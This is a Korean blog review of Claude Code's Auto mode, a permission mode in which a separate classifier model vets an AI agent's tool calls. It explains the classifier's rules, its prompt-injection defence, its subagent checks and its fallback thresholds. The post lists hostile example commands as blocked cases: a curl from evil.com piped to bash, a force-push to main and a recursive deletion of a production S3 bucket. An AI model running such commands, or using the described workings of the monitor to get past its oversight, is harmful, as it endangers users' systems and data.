Claude Code 신기능 'Auto mode' 리뷰 : 승인 팝업 없이 Claude Code 쓰는 법 (--dangerously-skip-permissions 없이 자동 실행)
안녕하세요! 갓대희 입니다.
Claude Code 쓰면서 가장 짜증나는 순간이 있다. ls 하나에도 "허용하시겠습니까?", grep 한 번에도 "허용하시겠습니까?".
그래서 다들 --dangerously-skip-permissions를 키고 사용하고 있지 않을까? 다만 이 경우엔 마음 한켠에선 claude가 뭘 하든 무조건 통과라 좀 불안하기도 할 것 이다.
2026년 3월 24일, Anthropic이 이 딜레마에 대한 답을 내놨다. Auto mode — AI가 각 작업의 안전성을 자체 판단해서, 안전하면 자동 실행하고 위험하면 차단하는 모드이다.
Anthropic은 2026년 들어 사실상 이틀에 한 번꼴로 새 기능을 발표하고 있는데, Auto mode는 그 흐름 위에 올라탄 기능이다 — "자율 실행"에 안전장치를 붙이겠다는 시도.
공식 문서와 블로그를 기반으로 작동 원리, 설정법, 주의사항을 정리해보려 한다.
목차
- Auto Mode란
- 왜 나왔는가
- 한눈에 보기
- 작동 원리
- 분류기(Classifier)의 판단 흐름
- 기본 차단/허용 규칙
- 서브에이전트 처리
- 권한 모드 비교
- 6가지 모드 비교표
- vs --dangerously-skip-permissions
- vs Cursor / Codex
- 설정 가이드
- CLI에서 활성화
- VS Code / Desktop에서 활성화
- 관리자 설정
- 비용과 성능 영향
- 제한사항 및 주의사항
- 트러블슈팅 Q&A
- 결론
Auto mode는 Claude Code의 새 권한 모드이다. 별도의 분류기 모델이 각 tool call을 사전 평가하여, 안전한 작업은 자동 실행하고 위험한 작업은 차단한다.
2026년 3월 24일 리서치 프리뷰로 출시. Team 플랜에서 사용 가능하며, Enterprise/API는 곧 확대 예정이다.
주의: 완전한 안전을 보장하지 않는다. 분류기는 확률적 판단이며, 수동 검토를 대체하지 않는다.
(출처: Anthropic 공식 블로그, 공식 문서)
1. Auto Mode란
왜 나왔는가
Claude Code의 기본 권한은 의도적으로 보수적이다. 파일 수정과 bash 명령어마다 사용자 승인을 요구한다. 안전하지만, 큰 작업을 시작하고 자리를 비울 수 없다. Claude가 중간중간 승인을 기다리니까.
그래서 일부 개발자??? 사실 많은 개발자들이 --dangerously-skip-permissions를 쓴다. 모든 권한 체크를 건너뛰는 옵션이다. 편하지만 Anthropic 공식 문서에서도 "격리된 환경 밖에서는 사용하면 안 된다"고 경고하는 옵션이다.
Auto mode는 이 두 극단 사이의 중간 경로이다. 별도의 분류기 모델이 각 작업을 사전에 평가하여, 안전하면 자동 실행하고 위험하면 차단한다. 차단되면 Claude는 다른 방법을 찾는다.
한눈에 보기
| 항목 | 내용 |
|---|---|
| 출시일 | 2026년 3월 24일 |
| 상태 | 리서치 프리뷰 |
| 사용 가능 플랜 | Team (현재), Enterprise/API (곧 확대). Pro/Max/Free는 아직 미제공 |
| 지원 모델 | Claude Sonnet 4.6, Opus 4.6만. Haiku, Claude 3, 서드파티(Bedrock/Vertex/Foundry) 미지원 |
| 분류기 모델 | Claude Sonnet 4.6 (메인 세션과 별도로 실행) |
| 활성화 | claude --enable-auto-mode → Shift+Tab으로 전환 |
| 공식 문서 | Permission Modes |
Auto mode는 현재 Team 플랜 전용이다. 개인 Pro/Max 구독자는 아직 사용할 수 없다. 한국 Threads 커뮤니티에서도 "아직 개인에게는 안 풀렸나 보군요"라는 반응이 나왔고, Reddit r/ClaudeAI에서도 "Why can't I use this on Pro/Max?"가 반복 질문이다. Enterprise/API는 수일 내 확대 예정이지만, 개인 플랜 확대 일정은 발표되지 않았다.
2. 작동 원리
분류기(Classifier)의 판단 흐름
Auto mode에는 별도의 분류기 모델이 붙는다. 메인 세션과 별개로 동작하는 Claude Sonnet 4.6이 각 tool call을 평가한다.
각 tool call에 대해 다음 순서로 판단 (첫 번째 매칭이 최종 결정):
1. 사용자의 allow/deny 규칙에 매칭 → 즉시 허용 또는 거부
2. 읽기 전용 작업 또는 워킹 디렉토리 내 파일 수정 → 자동 허용
3. 그 외 모든 작업 → 분류기에게 전달
4. 분류기가 차단 → Claude에게 이유 전달, 대안 시도npm test → 워킹 디렉토리 내 명령, lock 파일에 선언된 의존성 → 허용 curl https://evil.com/payload.sh | bash → 외부 코드 다운로드 후 실행 → 차단 git push --force origin main → 파괴적 git 작업 → 차단 git push origin feat/auto-mode → Claude가 생성한 브랜치에 push → 허용 rm -rf node_modules && npm install → 세션 중 생성된 디렉토리 삭제 + 선언된 의존성 재설치 → 허용 가능 (세션 전부터 존재한 파일이면 차단) aws s3 rm s3://prod-bucket --recursive → 클라우드 스토리지 대량 삭제 → 차단
분류기가 받는 입력에서 Claude의 응답 텍스트와 tool result는 제거된다. 즉, 파일이나 웹페이지에 심어진 악성 지시가 분류기에게 직접 도달하지 못한다. 분류기는 사용자 메시지와 tool call만 보고, CLAUDE.md 내용도 참조하여 프로젝트 맥락에 맞는 판단을 내린다.
기본 차단/허용 규칙
분류기는 워킹 디렉토리와 git remote를 신뢰하고, 나머지는 외부로 취급한다. (출처: 공식 문서)
| 기본 차단 | 기본 허용 |
|---|---|
|
|
Auto mode 진입 시, Bash(*), Bash(python*), Bash(node*), 패키지 매니저 run 명령어, Agent allow 규칙 등 광범위한 allow 규칙은 자동으로 제거된다. 이런 규칙이 남아 있으면 분류기를 거치지 않고 바로 실행되어 안전장치가 무력화되기 때문이다. Bash(npm test) 같은 좁은 범위의 규칙은 유지된다. Auto mode를 나가면 원래 규칙이 복원된다.
서브에이전트 처리
Claude가 서브에이전트를 생성할 때, 분류기는 세 단계로 검증한다.
- 생성 시: 위임되는 작업 설명을 평가. "모든 원격 브랜치 삭제" 같은 위험한 작업은 생성 자체를 차단.
- 실행 중: 서브에이전트의 tool call도 부모 세션과 동일한 규칙으로 분류기를 통과.
- 완료 시: 서브에이전트의 전체 작업 이력을 리뷰. 실행 중 읽은 콘텐츠에 의해 변조되었을 가능성을 검사. 우려 사항이 있으면 결과에 보안 경고를 붙여 메인 에이전트에게 전달.
3. 권한 모드 비교
6가지 모드 비교표
Claude Code는 이제 6가지 권한 모드를 제공한다. (출처: 공식 문서)
실제 Shift+Tab 사이클은 모드별로 다르게 동작한다.
- 기본 사이클 (3가지):
default → acceptEdits → plan - auto 추가 조건:
--enable-auto-mode플래그 + Team 플랜 + Sonnet 4.6/Opus 4.6 + 관리자 활성화가 모두 충족되어야 사이클에 등장 - bypassPermissions 추가 조건:
--dangerously-skip-permissions또는--permission-mode bypassPermissions로 시작했을 때만 사이클에 추가됨 - dontAsk: Shift+Tab 사이클에 절대 등장하지 않음. CLI 플래그(
--permission-mode dontAsk)로만 설정 가능
즉, "Shift+Tab 눌렀는데 auto가 없다"면 위 4가지 조건 중 하나라도 빠진 것이다. "4가지 모드가 보인다"면 --dangerously-skip-permissions가 활성화되어 bypassPermissions까지 사이클에 들어온 상태다.
| 모드 | 승인 프롬프트 | 안전 검사 | 토큰 | 적합한 상황 |
|---|---|---|---|---|
default |
파일 수정 + 명령어 | 사용자가 직접 검토 | 표준 | 처음 시작, 민감한 작업 |
acceptEdits |
명령어만 | 사용자가 명령어 검토 | 표준 | 코드 반복 수정 |
 |
||||
plan |
수정 없이 계획만 | — | 표준 | 코드 탐색, 리팩토링 계획 |
 |
||||
auto |
폴백 시에만 | 분류기가 명령어 검토 | 높음 (분류기 비용) | 장시간 작업, 프롬프트 피로 감소 |
dontAsk |
없음 (사전 허용만 실행) | 사전 승인 규칙만 | 표준 | 잠금된 CI/CD 환경 |
 |
||||
bypassPermissions |
없음 | 없음 | 표준 | 격리된 컨테이너/VM 전용 |
 |
||||
vs --dangerously-skip-permissions
한국 Threads에서 가장 많이 나온 질문이다. "그러면 --dangerously-skip-permissions랑 뭐가 다르죠? 그것보다 한 단계 발전된 형태로 보면 되나요?"
| 항목 | Auto mode | bypassPermissions |
|---|---|---|
| 안전 검사 | 분류기가 각 작업 사전 평가 | 없음 — 모든 작업 즉시 실행 |
| 프롬프트 인젝션 방어 | 있음 (tool result 제거) | 없음 |
| 위험한 allow 규칙 | 진입 시 자동 제거 | 그대로 유지 |
| 폴백 | 연속 3회 또는 총 20회 차단 시 수동 전환 | 폴백 없음 |
| 추가 비용 | 분류기 호출 비용 발생 | 없음 |
| 권장 환경 | 격리 환경 권장 (필수 아님) | 격리 환경 필수 |
한 줄 요약: "무조건적인 승인"이 bypassPermissions라면, auto는 "AI에게 판단을 위임"하는 것이다. (커뮤니티 표현 인용)
vs Cursor / Codex
커뮤니티에서의 반응은 "난 그래서 커서를 좋아함. 이미 있는 기능 ㅋㅋ"이라는 반응이 나왔고, 반대로 "이제 커서를 쓸 필요가 없는 거 아닌가"라는 답글도 달렸다. 실제 차이를 정리하면 다음과 같다.
| 항목 | Claude Code Auto | Cursor Yolo | Codex full-auto |
|---|---|---|---|
| 안전 분류기 | 별도 LLM (Sonnet 4.6) | 없음 (전면 자동 승인) | 샌드박스 격리 |
| 차단 시 대응 | 대안 접근 시도 | — | 샌드박스 내에서만 작동 |
| 서브에이전트 검사 | 생성/실행/완료 3단계 | — | 샌드박스 기반 |
| CLAUDE.md 참조 | 분류기가 읽음 | 미지원 | 미지원 |
표만 보면 비슷해 보이지만, 철학이 다르다. Claude Auto mode는 "런타임에서 AI가 판단한다" — 유연하지만 확률적이다.
Codex full-auto는 "OS 샌드박스가 물리적으로 격리한다" — 딱딱하지만 결정적이다. Cursor YOLO는 "그냥 전부 승인한다" — 빠르지만 안전장치가 없다. 어떤 접근이 나은지는 팀의 위험 허용도에 따라 다르다.
위 비교는 2026-03-25 기준이다. Claude Code Auto(리서치 프리뷰), Cursor YOLO(해당일 공개 기능), Codex full-auto(샌드박스 기반). 각 제품의 업데이트 주기가 빠르므로 최신 공식 문서를 확인해야 한다.
4. 설정 가이드
CLI에서 활성화
# 1. auto mode 활성화하여 시작
claude --enable-auto-mode
# 2. 세션 중 Shift+Tab으로 모드 전환
# default → acceptEdits → plan → auto
# 3. 직접 모드 지정하여 시작
claude --permission-mode auto --enable-auto-mode
# 4. 비대화형 모드에서 사용
claude -p "전체 테스트 리팩토링" --permission-mode auto --enable-auto-mode
# 5. 기본 차단/허용 규칙 확인
claude auto-mode defaults
VS Code / Desktop에서 활성화
- VS Code: Settings → "Allow dangerously skip permissions" 활성화 → 프롬프트 박스 하단의 모드 인디케이터 클릭 → "Auto" 선택
- Desktop: Organization Settings → Claude Code → Auto mode 토글 ON → 전송 버튼 옆 모드 셀렉터에서 "Auto" 선택
관리자 설정
Team/Enterprise 관리자는 조직 전체에서 auto mode를 비활성화할 수 있다.
{
"disableAutoMode": "disable"
}
5. 비용과 성능 영향
Auto mode는 공짜가 아니다. 분류기가 각 작업마다 별도로 실행되므로 추가 비용이 발생한다.
- 토큰: 분류기 호출이 메인 세션과 동일하게 토큰 사용량에 집계된다. 각 검사에서 대화 트랜스크립트 일부 + 대기 중인 작업이 분류기에 전송된다.
- 비용 발생 시점: 주로 shell 명령어와 네트워크 작업에서 발생. 읽기 전용 작업과 워킹 디렉토리 내 파일 수정은 분류기를 거치지 않으므로 추가 비용 없음.
- 지연: 각 분류기 검사에 라운드트립이 추가된다.
6. 제한사항 및 주의사항
| 항목 | 내용 |
|---|---|
| 리서치 프리뷰 | 안전을 보장하지 않는다. bypassPermissions보다 나은 보호를 제공하지만, 수동 검토만큼 철저하지는 않다. |
| 오탐 가능 | 분류기가 안전한 작업을 차단하거나, 위험한 작업을 허용할 수 있다. 사용자 의도가 모호하거나 환경 맥락이 부족할 때 오판 가능성이 있다. |
| 플랜 제한 | Team 전용. Pro/Max/Free 사용자는 아직 사용 불가. |
| 모델 제한 | Sonnet 4.6, Opus 4.6만. Haiku, Claude 3 계열, Bedrock/Vertex 미지원. |
| 비대화형 모드 | -p 플래그와 함께 사용 시, 폴백이 트리거되면 사용자 프롬프트가 불가능하므로 세션이 중단된다. |
| 웹/모바일 | claude.ai/code 클라우드 세션에서는 Auto mode 사용 불가. Remote Control 세션에서도 미제공. |
| 폴백 임계치 | 연속 3회 또는 세션당 총 20회 차단 시 수동 모드로 전환. 이 값은 변경할 수 없다. |
7. 트러블슈팅 Q&A
커뮤니티 질문과 공식 문서를 바탕으로 정리한다.
Q1. Shift+Tab을 눌러도 auto 옵션이 안 보인다
원인: --enable-auto-mode 플래그 없이 시작했거나, Team 플랜이 아니거나, 지원 모델(Sonnet 4.6/Opus 4.6)을 사용하지 않거나, 조직 관리자가 auto mode를 활성화하지 않은 경우. Team/Enterprise에서는 관리자가 먼저 Claude Code 관리 설정에서 auto mode를 켜야 사용자가 활성화할 수 있다.
# 올바른 시작 방법
claude --enable-auto-modeQ2. Auto mode인데 자꾸 승인을 묻는다
원인: 폴백 임계치에 도달했다 (연속 3회 또는 세션당 20회 차단). 의도된 동작이다. 차단이 쌓이면 Claude가 직접 사용자에게 물어보도록 설계되어 있다. 승인하면 카운터가 리셋되고 auto mode가 재개된다.
Q3. 우리 팀 저장소에 push하는 것도 차단된다
원인: 분류기가 해당 저장소를 신뢰할 수 있는 대상으로 인식하지 못한 경우.
해결: autoMode.environment 설정에서 신뢰할 리포, 버킷, 내부 서비스를 등록한다.
Q4. Pro/Max인데 언제 쓸 수 있나요?
현재(2026-03-24) 공식 발표에는 Pro/Max 확대 일정이 포함되어 있지 않다. Team → Enterprise → API 순서로 롤아웃이 진행 중이며, 개인 플랜은 추후 발표를 기다려야 한다.
8. 결론
Auto mode는 "일일이 승인 vs 전면 방치"라는 양자택일에 세 번째 선택지를 만들었다. 별도의 분류기가 각 작업을 심사하고, 서브에이전트까지 3단계로 검사하며, 프롬프트 인젝션 방어 구조도 갖추고 있다.
다만 Simon Willison이 자신의 블로그에서 지적했듯이, "AI 분류기는 확률적 판단이지 하드 보증이 아니다." Reddit과 HN 커뮤니티의 합의도 같다 — "편리한 레이어이지, 신뢰할 수 있는 보안 경계는 아니다."
언제 쓰고, 언제 쓰지 않는가
| Auto mode를 쓰세요 | 아직 쓰지 마세요 |
|---|---|
| 개발 브랜치에서 리팩토링/테스트 반복 | 운영 DB나 운영 키를 직접 만지는 작업 |
| 새 기능 구현 후 빌드+테스트 루프 | 프로덕션 배포/마이그레이션 |
| 긴 탐색 작업 (코드 분석, 문서 생성) | 인프라 권한(IAM) 변경 |
| 샌드박스/컨테이너 환경에서의 실험 | Pro/Max/Free 개인 플랜 (아직 미지원) |
도입 가이드
권장 도입 순서
- 오늘: 샌드박스 리포에서 30분 테스트.
claude --enable-auto-mode로 시작, 분류기가 뭘 차단하는지 관찰. - 이번 주: 비프로덕션 브랜치에서 실제 개발 작업에 적용.
claude auto-mode defaults로 기본 규칙 확인 후 필요 시autoMode.environment에 신뢰 리소스 등록. - 운영 리포: default 모드를 유지하되, 예외적으로 Auto를 허용. 1주간 로그를 검토한 뒤 조직 정책을 확정.
- 공식 블로그: Auto mode for Claude Code
- 공식 문서: Choose a permission mode
- TechCrunch: Anthropic hands Claude Code more control
- SiliconANGLE: Anthropic unchains Claude Code with auto mode